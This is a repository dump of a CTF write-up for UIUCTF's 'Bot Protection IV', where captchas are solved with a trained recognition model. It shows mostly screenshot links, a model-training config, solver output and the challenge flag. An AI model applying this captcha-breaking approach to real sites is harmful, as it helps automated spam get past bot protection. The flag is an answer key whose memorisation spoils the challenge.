/web/UIUCTF/Bot_Protection_IV/6.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/6.jpg
--------------------------------------------------------------------------------
/web/UIUCTF/Bot_Protection_IV/7.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/7.jpg
--------------------------------------------------------------------------------
/web/UIUCTF/Bot_Protection_IV/8.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/8.jpg
--------------------------------------------------------------------------------
/web/UIUCTF/Bot_Protection_IV/9.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/9.jpg
--------------------------------------------------------------------------------
/web/UIUCTF/Bot_Protection_IV/FDSEJ.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/FDSEJ.png
--------------------------------------------------------------------------------
/web/UIUCTF/Bot_Protection_IV/JGGSS.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/JGGSS.png
--------------------------------------------------------------------------------
/web/UIUCTF/Bot_Protection_IV/JPSCB.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/JPSCB.png
--------------------------------------------------------------------------------
/web/UIUCTF/Bot_Protection_IV/PTJYZ.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/PTJYZ.png
--------------------------------------------------------------------------------
/web/UIUCTF/Bot_Protection_IV/UZNXF_54629.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/UZNXF_54629.png
--------------------------------------------------------------------------------
/web/UIUCTF/Bot_Protection_IV/VJGJJ.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/VJGJJ.png
--------------------------------------------------------------------------------
/web/UIUCTF/Bot_Protection_IV/YJKYY.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/YJKYY.png
--------------------------------------------------------------------------------
/web/UIUCTF/Bot_Protection_IV/chall.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/chall.jpg
--------------------------------------------------------------------------------
/web/UIUCTF/Bot_Protection_IV/charset.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/charset.jpg
--------------------------------------------------------------------------------
/web/UIUCTF/Bot_Protection_IV/comment.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/comment.jpg
--------------------------------------------------------------------------------
/web/UIUCTF/Bot_Protection_IV/ensemble_learning.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/ensemble_learning.jpg
--------------------------------------------------------------------------------
/web/UIUCTF/Bot_Protection_IV/failure.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/failure.jpg
--------------------------------------------------------------------------------
/web/UIUCTF/Bot_Protection_IV/lv169.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/lv169.jpg
--------------------------------------------------------------------------------
/web/UIUCTF/Bot_Protection_IV/lv225.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/lv225.jpg
--------------------------------------------------------------------------------
/web/UIUCTF/Bot_Protection_IV/mainpage.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/mainpage.jpg
--------------------------------------------------------------------------------
/web/UIUCTF/Bot_Protection_IV/model1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/model1.jpg
--------------------------------------------------------------------------------
/web/UIUCTF/Bot_Protection_IV/readme.md:
--------------------------------------------------------------------------------
![alt text](0.jpg)

```
Challenge
4 Solves
Bot Protection IV
Point Value: 500
Challenge Description
When on website: +1 spam resistance +10 user annoyance

Gotta be fast! 500 in 10 minutes!

https://captcha.chal.uiuc.tf

Author: tow_nater

```

![alt text](chall.jpg)

![alt text](1.jpg)

![alt text](mainpage.jpg)

![alt text](2.jpg)

![alt text](charset.jpg)

![alt text](3.jpg)

![alt text](comment.jpg)


```html

```

![alt text](4.jpg)

![alt text](unzip.jpg)


![alt text](5.jpg)

![alt text](UZNXF_54629.png)

![alt text](6.jpg)

```json
{
  "origin_image_dir": "/home/xxx/solve/captchas/",
  "new_image_dir": "/home/xxx/solve/new_train/",
  "train_image_dir": "/home/xxx/solve/train/",
  "test_image_dir": "/home/xxx/solve/test/",
  "api_image_dir": "sample/api/",
  "online_image_dir": "sample/online/",
  "local_image_dir": "sample/local/",
  "model_save_dir": "model_v8/",
  "image_width": 250,
  "image_height": 75,
  "max_captcha": 5,
  "image_suffix": "png",
  "char_set": "ABCDEFGHIJKLMNOPQRSTUVWXYZ",
  "use_labels_json_file": false,
  "remote_url": "http://127.0.0.1:6100/captcha/",
  "cycle_stop": 20000,
  "acc_stop": 0.99,
  "cycle_save": 500,
  "enable_gpu": 1,
  "train_batch_size": 32,
  "test_batch_size": 32
}
```

![alt text](7.jpg)

![alt text](model1.jpg)


![alt text](8.jpg)

![alt text](ensemble_learning.jpg)

![alt text](9.jpg)

![alt text](lv169.jpg)

![alt text](10.jpg)

![alt text](lv225.jpg)

![alt text](11.jpg)

![alt text](solved.jpg)

```
Level 497 is not high enough
Invalid captcha
Invalid captcha
Invalid captcha
Invalid captcha
Invalid captcha
Level 498 is not high enough
Level 499 is not high enough
uiuctf{i_knew_a_guy_in_highschool_that_could_read_this}
Traceback (most recent call last):
  File "man.py", line 168, in
    main()
  File "man.py", line 159, in main
    lv = int(header.split(" ")[1])
IndexError: list index out of range

```

```
Flag : uiuctf{i_knew_a_guy_in_highschool_that_could_read_this}
```

![alt text](12.jpg)

⋮⊣⊣ᓭᓭ :

![alt text](JGGSS.png)

||⋮ꖌ|||| :

![alt text](YJKYY.png)


![alt text](13.jpg)

||⋮ꖌ|||| :

![alt text](YJKYY.png)

⋮!¡ᓭᓵʖ :

![alt text](JPSCB.png)

⎓↸ᓭᒷ⋮ :

![alt text](FDSEJ.png)

⍊⋮⊣⋮⋮ :

![alt text](VJGJJ.png)

![alt text](14.jpg)

![alt text](PTJYZ.png)

![alt text](15.jpg)

![alt text](failure.jpg)


T⍑ᔑリꖌᓭ ⎓𝙹∷ ∷ᒷᔑ↸╎リ⊣ ⚍リℸ ̣ ╎ꖎ ⍑ᒷ∷ᒷ :)
--------------------------------------------------------------------------------
/web/UIUCTF/Bot_Protection_IV/solved.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/solved.jpg
--------------------------------------------------------------------------------
/web/UIUCTF/Bot_Protection_IV/unzip.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/unzip.jpg
--------------------------------------------------------------------------------